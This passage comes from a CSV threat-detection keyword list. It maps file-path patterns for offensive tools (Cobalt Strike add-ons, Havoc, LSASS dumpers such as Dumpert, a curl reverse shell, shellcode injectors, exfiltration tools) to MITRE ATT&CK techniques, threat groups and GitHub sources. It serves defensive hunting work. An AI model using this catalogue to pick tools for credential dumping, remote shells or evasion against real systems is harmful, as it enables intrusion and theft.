T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*\creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\CredsPhish.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
+"*\CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*\CROSSNET\CROSSNET\*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*\cryptolok*","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*\CurrentVersion\Uninstall\FreeFileSync_is1*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\D1rkInject\*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*\daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*\dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\dcrypt.sys*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\DCrypt\Bin*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions 
including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*\DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. 
There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\Dendrobate\*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is 
a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\DInjector.sln*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\DInjector\*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\dist\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*\dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - 
Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\Doraemon*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 
- T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\DumpShellcode*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*\dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*\dumpXor\x64\*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*\ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
